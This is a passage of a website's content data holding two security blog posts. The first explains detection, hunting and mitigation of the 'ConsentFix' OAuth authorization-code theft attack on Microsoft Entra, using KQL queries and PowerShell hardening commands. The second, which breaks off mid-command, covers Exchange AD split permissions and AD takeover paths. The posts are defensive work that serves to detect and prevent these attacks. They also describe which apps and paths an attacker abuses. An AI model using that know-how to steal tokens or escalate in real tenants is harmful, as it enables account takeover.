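let code_lifetime = 11m;    // codes expire after about 10 minutes, so leave some slack
let automation_floor = 5s;  // assumption: automated clients redeem within seconds
let interactive = SigninLogs
    | where TimeGenerated > ago(lookback)
    | where ResultType == '0'
    | where isnotempty(SessionId)
    | project SessionId, AppId, UserId, UserPrincipalName, AppDisplayName,
              InteractiveTime = TimeGenerated, InteractiveIP = IPAddress;
let redemptions = AADNonInteractiveUserSignInLogs
    | where TimeGenerated > ago(lookback)
    | where ResultType == '0'
    | where isnotempty(SessionId)
    | project SessionId, AppId, UserId, RedeemTime = TimeGenerated,
              RedeemIP = IPAddress, RedeemResource = ResourceDisplayName;
interactive
| join kind=inner redemptions on SessionId, AppId, UserId
// the redemption must come after the interactive sign-in and within the code lifetime
| where RedeemTime > InteractiveTime
| extend Delta = RedeemTime - InteractiveTime
| where Delta <= code_lifetime
// only the very next non-interactive event after each interactive sign-in counts
| summarize arg_min(RedeemTime, *) by SessionId, AppId, UserId, InteractiveTime
// human copy/paste or drag/drop takes longer than an automated client
| where Delta > automation_floor
// the attacker redeems from their own infrastructure; relax this behind
// SD-WAN, ZTNA or Secure Web Gateway egress changes
| where InteractiveIP != RedeemIP
| project InteractiveTime, RedeemTime, Delta, UserPrincipalName, AppDisplayName,
          InteractiveIP, RedeemIP, RedeemResource, SessionId
| order by RedeemTime desc
```

Run it over a reproduction of the attack first: the redemption row should show your lab egress IP in InteractiveIP and the attacker-side IP in RedeemIP, with a Delta of tens of seconds to a few minutes. The ResourceDisplayName is projected for triage only and is deliberately not part of the join, since the resource is not bound to the code.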
The targeted application ID cannot be changed.",[41,22795,22797],{"id":22796},"reduce-the-noise","Reduce the noise",[12,22799,22800],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[12,22802,22803],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[12,22805,22806],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[12,22808,22809],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[41,22811,22813],{"id":22812},"affected-first-party-applications","Affected first-party applications",[12,22815,22816],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. 
The attacker could also abuse test and dev reply URLs that are not publicly resolvable.",[12,22818,22819],{},"Here is a list of the most notable applications that also have high pre-consented permissions on resources.",[1254,22821,22822,22825,22828,22831,22834],{},[1257,22823,22824],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[1257,22826,22827],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[1257,22829,22830],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[1257,22832,22833],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[1257,22835,22836],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[12,22838,22839,22840,22845],{},"A full list of these apps is now included in ",[2672,22841,22844],{"href":22842,"rel":22843},"https://entrascopes.com/?authcodeFix=true",[2676],"EntraScopes.com"," by our colleague Fabian Bader.",[41,22847,22849],{"id":22848},"mitigations-and-protections","Mitigations and Protections",[186,22851,22853],{"id":22852},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[52,22855,22858,22861,22862,22864,22867,22868,22870,22873],{"className":22856},[22857],"option-block",[251,22859,22860],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[531,22863],{},[251,22865,22866],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[531,22869],{},[251,22871,22872],{},"Scope:"," limited\n",[186,22875,22877],{"id":22876},"option-1-require-user-assignment","Option 1: Require User Assignment",[4338,22879,22881],{"id":22880},"pre-requisites","Pre-requisites:",[1254,22883,22884,22887,22890],{},[1257,22885,22886],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[1257,22888,22889],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[1257,22891,22892],{},"Establish a process to 
assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[2127,22894,22895],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[56,22897,22899],{"className":22898},[524],[63,22900,22901],{},"\n# Example for Microsoft Graph PowerShell (needs Application.ReadWrite.All)\nConnect-MgGraph -Identity  # managed identity; interactively use -Scopes 'Application.ReadWrite.All'\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" # Microsoft Azure CLI\n# First-party apps often have no service principal in the tenant yet; create it if missing\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nif (-not $sp) { $sp = New-MgServicePrincipal -AppId $AppId }\n# Require user assignment: only assigned users and groups can obtain tokens for this client\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$true\n",[4338,22903,22905],{"id":22904},"benefit","Benefit:",[1254,22907,22908,22911,22914,22917],{},[1257,22909,22910],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[1257,22912,22913],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[1257,22915,22916],{},"Applied before evaluating Conditional Access policies.",[1257,22918,22919],{},"Limits the attack surface for other scenarios as well.",[4338,22921,22923],{"id":22922},"disadvantage","Disadvantage:",[1254,22925,22926,22929,22932],{},[1257,22927,22928],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[1257,22930,22931],{},"All legitimate CLI tool users must be identified",[1257,22933,22934],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[186,22936,22938],{"id":22937},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access 
Policies",[4338,22940,22881],{"id":22941},"pre-requisites-1",[1254,22943,22944,22947],{},[1257,22945,22946],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[1257,22948,22949],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[4338,22951,22905],{"id":22952},"benefit-1",[1254,22954,22955,22958],{},[1257,22956,22957],{},"Prevents token issuance for non-legitimate or non-privileged users.",[1257,22959,22960],{},"Allows granular scoping based on additional conditions such as device or network.",[4338,22962,22923],{"id":22963},"disadvantage-1",[1254,22965,22966,22969],{},[1257,22967,22968],{},"All legitimate CLI tool users must be identified and excluded.",[1257,22970,22971],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[186,22973,22975],{"id":22974},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[2127,22977,22978],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[52,22980,22982,22985,22986,22988,22990,22991,22993,22990,22995,22997,22999],{"className":22981},[22857],[251,22983,22984],{},"Option:"," Require Token Protection",[531,22987],{},[251,22989,22860],{}," High",[531,22992],{},[251,22994,22866],{},[531,22996],{},[251,22998,22872],{}," Very limited\n",[4338,23001,22881],{"id":23002},"pre-requisites-2",[1254,23004,23005,23008,23011,23030],{},[1257,23006,23007],{},"Microsoft Entra ID P1 licenses",[1257,23009,23010],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[1257,23012,23013,23014,805,23019,2901,23024,23029],{},"Enable Web Account 
Manager (WAM) in ",[2672,23015,23018],{"href":23016,"rel":23017},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[2676],"Azure CLI",[2672,23020,23023],{"href":23021,"rel":23022},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[2676],"Azure PowerShell",[2672,23025,23028],{"href":23026,"rel":23027},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[2676],"Microsoft Graph PowerShell"," (default in latest versions)",[1257,23031,23032,23033],{},"Configure Conditional Access targeting:\n",[1254,23034,23035,23049,23056],{},[1257,23036,23037,23038],{},"Cloud App targeting to the following apps:\n",[1254,23039,23040,23043,23046],{},[1257,23041,23042],{},"Office 365 Exchange Online",[1257,23044,23045],{},"Office 365 SharePoint Online",[1257,23047,23048],{},"Microsoft Teams Services",[1257,23050,23051,23052,23055],{},"Client apps under ",[3456,23053,23054],{},"Mobile apps and desktop clients"," to require Token Protection.",[1257,23057,23058,23059,23062,23063,23066],{},"Select ",[3456,23060,23061],{},"Windows"," as ",[3456,23064,23065],{},"device platform"," for targeting the policy",[4338,23068,22905],{"id":23069},"benefit-2",[12,23071,23072],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. 
Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[12,23074,23075],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code-to-token exchange.",[12,23077,23078],{},"In this case, AuthCodeFix attacks are fully mitigated as long as the application can be protected by Token Protection.",[12,23080,23081],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[12,23083,23084],{},[2642,23085],{"alt":23086,"src":23087},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[4338,23089,22923],{"id":23090},"disadvantage-2",[1254,23092,23093,23123,23126,23129],{},[1257,23094,23095,23096],{},"Only the following resources are officially supported:\n",[1254,23097,23098,23100,23102],{},[1257,23099,23042],{},[1257,23101,23045],{},[1257,23103,23048,23104,23106,23108,23109,2901,23112,23116,23117,23122],{},[531,23105],{},[531,23107],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. \"Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[2672,23110,23018],{"href":23016,"rel":23111},[2676],[2672,23113,23023],{"href":23114,"rel":23115},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[2676],") support WAM, which is a client-side requirement to use Token Protection. 
Microsoft has announced ",[2672,23118,23121],{"href":23119,"rel":23120},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[2676],"in a blog post"," that token protection capabilities will be extended to Azure management scenarios.",[1257,23124,23125],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[1257,23127,23128],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also affect productivity access to Microsoft 365.",[1257,23130,23131],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[186,23133,23135],{"id":23134},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[52,23137,23139,23141,23142,23144,23141,23146,23148,23150],{"className":23138},[22857],[251,23140,22860],{}," Medium",[531,23143],{},[251,23145,22866],{},[531,23147],{},[251,23149,22872],{}," Broad\n",[186,23152,23154],{"id":23153},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[4338,23156,23158],{"id":23157},"pre-requisite","Pre-requisite:",[1254,23160,23161,23164,23167,23170],{},[1257,23162,23163],{},"Entra ID P1 license",[1257,23165,23166],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Android and iOS platform",[1257,23168,23169],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[1257,23171,23172],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[4338,23174,22905],{"id":23175},"benefit-3",[12,23177,23178],{},"Block additional token issuance by enforcing a trusted 
network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[2110,23180,23181],{},[12,23182,23183],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[4338,23185,22923],{"id":23186},"disadvantage-3",[1254,23188,23189,23192,23195],{},[1257,23190,23191],{},"Only applicable for users and devices with deployed Global Secure Access client",[1257,23193,23194],{},"Limited scope due to availability on Entra ID–integrated devices",[1257,23196,23197],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[41,23199,23201],{"id":23200},"hunting-queries","Hunting queries",[12,23203,23204,23205,23208],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[63,23206,23207],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[186,23210,23212],{"id":23211},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[12,23214,23215,23216,23218],{},"This hunting query leverages ",[63,23217,23207],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. 
This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[2110,23220,23221],{},[12,23222,23223],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[12,23225,23226,23229,23230,23233,23234,23237],{},[251,23227,23228],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[63,23231,23232],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[63,23235,23236],{},"com.microsoft.CompanyPortalMac.ssoextension",")  when using Platform SSO.",[12,23239,23240,23243],{},[251,23241,23242],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). 
Attackers cannot issue further bound tokens without PoP, so an unbound refresh token is another strong indicator.",[12,23245,23246,23249],{},[251,23247,23248],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[12,23251,23252,23255],{},[251,23253,23254],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[1254,23257,23258,23261,23264],{},[1257,23259,23260],{},"Presence of a browser process initiating token requests.",[1257,23262,23263],{},"Detection of a downgrade to unbound tokens.",[1257,23265,23266],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[12,23268,23269],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[12,23271,23272],{},[2642,23273],{"alt":23274,"src":23275},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[12,23277,23278],{},"The following scoring will be shown depending on the conditions:",[12,23280,23281,23284,23285,23287,23288,23290,23292,23295,23296,23298,23300,23303],{},[251,23282,23283],{},"A very high confidence score"," is displayed when ",[63,23286,23207],{}," logs show a familiar browser process initiating the token request, and a downgrade to an unbound token has been detected.",[531,23289],{},[531,23291],{},[251,23293,23294],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[531,23297],{},[531,23299],{},[251,23301,23302],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[12,23305,23306,23307,1013],{},"You’ll find the latest version of the hunting query on 
",[2672,23308,23311],{"href":23309,"rel":23310},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[2676],"GitHub",[186,23313,23315],{"id":23314},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[12,23317,23318,23319,23324,23325,23328,23329,23331,23332,23335],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[2672,23320,23323],{"href":23321,"rel":23322},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[2676],"published a KQL function"," called ",[63,23326,23327],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[63,23330,22759],{}," can be correlated with suspicious ",[63,23333,23334],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[12,23337,23338],{},[2642,23339],{"alt":23340,"src":23341},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[12,23343,23344],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. 
The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[12,23346,23347],{},[2642,23348],{"alt":23349,"src":23350},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[41,23352,23354],{"id":23353},"further-reading","Further Reading",[1254,23356,23357,23364,23371,23378],{},[1257,23358,23359],{},[2672,23360,23363],{"href":23361,"rel":23362},"https://pushsecurity.com/blog/consentfix",[2676],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[1257,23365,23366],{},[2672,23367,23370],{"href":23368,"rel":23369},"https://youtu.be/AAiiIY-Soak",[2676],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[1257,23372,23373],{},[2672,23374,23377],{"href":23375,"rel":23376},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[2676],"Microsoft identity platform and OAuth 2.0 authorization code flow",[1257,23379,23380],{},[2672,23381,23384],{"href":23382,"rel":23383},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[2676],"Microsoft Azure CLI on 
entrascopes.com",{"title":65,"searchDepth":111,"depth":111,"links":23386},[23387,23390,23391,23392,23400,23404],{"id":22717,"depth":111,"text":22718,"children":23388},[23389],{"id":22743,"depth":329,"text":22744},{"id":22796,"depth":111,"text":22797},{"id":22812,"depth":111,"text":22813},{"id":22848,"depth":111,"text":22849,"children":23393},[23394,23395,23396,23397,23398,23399],{"id":22852,"depth":329,"text":22853},{"id":22876,"depth":329,"text":22877},{"id":22937,"depth":329,"text":22938},{"id":22974,"depth":329,"text":22975},{"id":23134,"depth":329,"text":23135},{"id":23153,"depth":329,"text":23154},{"id":23200,"depth":111,"text":23201,"children":23401},[23402,23403],{"id":23211,"depth":329,"text":23212},{"id":23314,"depth":329,"text":23315},{"id":23353,"depth":111,"text":23354},{"lang":2171,"seoTitle":23406,"titleClass":2173,"date":23407,"categories":23408,"blogtitlepic":23409,"socialimg":23410,"customExcerpt":23411,"keywords":23412,"hreflang":23413,"scripts":23418,"asideNav":23419,"maxContent":2181,"published":2181},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[2176],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. 
We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[23414,23416],{"lang":2260,"href":23415},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":2263,"href":23417},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":2181,"form":2181},{"menuItems":23420},[23421,23423,23425,23427,23429,23431],{"href":23422,"text":22718},"#detection-artifacts",{"href":23424,"text":22797},"#reduce-the-noise",{"href":23426,"text":22813},"#affected-first-party-applications",{"href":23428,"text":22849},"#mitigations-and-protections",{"href":23430,"text":23201},"#hunting-queries",{"href":23432,"text":23354},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":22622,"description":22628},"posts/2025-12-31-vulnerability-consentfix",[23437,23438,6236],"OAuth 2.0","Microsoft Entra ID","4UG-WoC2ftVsQzfnag7pJEA-GrE8udM7ACoKFmjhLYw",{"id":23441,"title":23442,"author":23443,"body":23444,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24102,"moment":24104,"navigation":2181,"path":24129,"seo":24130,"stem":24131,"tags":2166,"webcast":2168,"__hash__":24132},"content_en/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without 
regrets",[2349],{"type":9,"value":23445,"toc":24089},[23446,23450,23453,23459,23464,23480,23483,23489,23493,23497,23505,23519,23525,23528,23533,23569,23592,23596,23604,23612,23617,23633,23637,23643,23647,23652,23710,23715,23752,23755,23759,23773,23780,23796,23805,23809,23812,23858,23861,23870,23879,23882,23896,23913,23926,23938,23943,24002,24006,24011,24031,24038,24062,24066,24069,24072,24086],[41,23447,23449],{"id":23448},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[12,23451,23452],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[12,23454,23455],{},[2642,23456],{"alt":23457,"src":23458},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[12,23460,23461],{},[251,23462,23463],{},"It’s achieved in three steps:",[3259,23465,23467,23474,23477],{"style":23466},"margin: 0.25rem 0",[1257,23468,23469,23470],{},"Implement ",[2672,23471,23473],{"href":23472},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions","AD split permission model",[1257,23475,23476],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[1257,23478,23479],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[12,23481,23482],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[23484,23485],"video-frame",{"thumb":23486,"alt":23487,"id":23488,":full-width":3821},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by 
glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[52,23490,23492],{"style":23491},"background:var(--color-black-4); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-blue-dark)","Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[41,23494,23496],{"id":23495},"why-do-we-care-now","Why do we care (now)?",[12,23498,23499,23500,23502,23504],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[531,23501],{},[531,23503],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[1254,23506,23507,23510,23513,23516],{"style":23466},[1257,23508,23509],{},"modify permissions on users and groups (effectively full access)",[1257,23511,23512],{},"modify group members",[1257,23514,23515],{},"reset password on users",[1257,23517,23518],{},"create/delete users and groups",[12,23520,23521],{},[2642,23522],{"alt":23523,"src":23524},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[12,23526,23527],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[12,23529,23530],{},[251,23531,23532],{},"Prominent examples:",[1254,23534,23535,23538,23558],{"style":23466},[1257,23536,23537],{},"Entra 
Connect Sync account when using Password Hash Sync",[1257,23539,23540,23541],{},"Default groups",[1254,23542,23544,23547,23555],{"style":23543},"margin: 0",[1257,23545,23546],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[1257,23548,23549,23550,23554],{},"Also see ",[2672,23551,23553],{"href":23552,"target":4914},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta","Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[1257,23556,23557],{},"Emptying Protected Users to create attack vectors by removing protections",[1257,23559,23560,23561],{},"Unprotected custom groups or admin/service accounts",[1254,23562,23563,23566],{"style":23543},[1257,23564,23565],{},"Write permission on GPOs (applying to domain controller)",[1257,23567,23568],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[12,23570,23571,23572,23574,23576,23577,23582,23584,23586,23587],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,23573],{},[531,23575],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. 
",[2672,23578,23581],{"href":23579,"rel":23580},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[2676],"Configure Exchange Server for split permissions | Microsoft Learn",[531,23583],{},[531,23585],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[2672,23588,23591],{"href":23589,"rel":23590},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[2676],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[41,23593,23595],{"id":23594},"but-why-is-no-one-doing-it","But why is no one doing it?",[12,23597,23598,23599,23601,23603],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[531,23600],{},[531,23602],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[2110,23605,23606],{},[12,23607,23608,23611],{},[251,23609,23610],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[12,23613,23614],{},[251,23615,23616],{},"Adoption examples:",[1254,23618,23619,23630],{"style":23466},[1257,23620,23621,23622],{},"New-Mailbox (where Exchange writes to AD) would be:",[1254,23623,23624,23627],{"style":23543},[1257,23625,23626],{},"New-ADUser (where adm.jdoe writes to 
AD)",[1257,23628,23629],{},"Enable-Mailbox",[1257,23631,23632],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[41,23634,23636],{"id":23635},"show-me-this-no-regrets-option","Show me this no-regrets option!",[12,23638,23639,23642],{},[251,23640,23641],{},"Disclaimer",": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[186,23644,23646],{"id":23645},"audit-current-usage","Audit current usage",[12,23648,23649],{},[251,23650,23651],{},"You should first check which of the affected cmdlets are in use on which OUs:",[524,23653,23654,23661,23663,23669,23671],{},[102,23655,23656,23660],{},[102,23657,23659],{"style":23658},"color:var(--color-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[531,23662],{},[102,23664,23665,23668],{},[102,23666,23667],{"style":23658},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[531,23670],{},[102,23672,23673,540,23676,23680,23681,540,23684,23686,23687,23690,23691,540,23694,540,23697,540,23699,23702,23703,23706,23707],{},[102,23674,23675],{"style":23658},"Search-AdminAuditLog",[102,23677,23679],{"style":23678},"color:var(--color-blue-medium)","-ResultSize"," 99000 ",[102,23682,23683],{"style":23678},"-Cmdlets",[102,23685,23667],{"style":23658}," | ",[102,23688,23689],{"style":23658},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", 
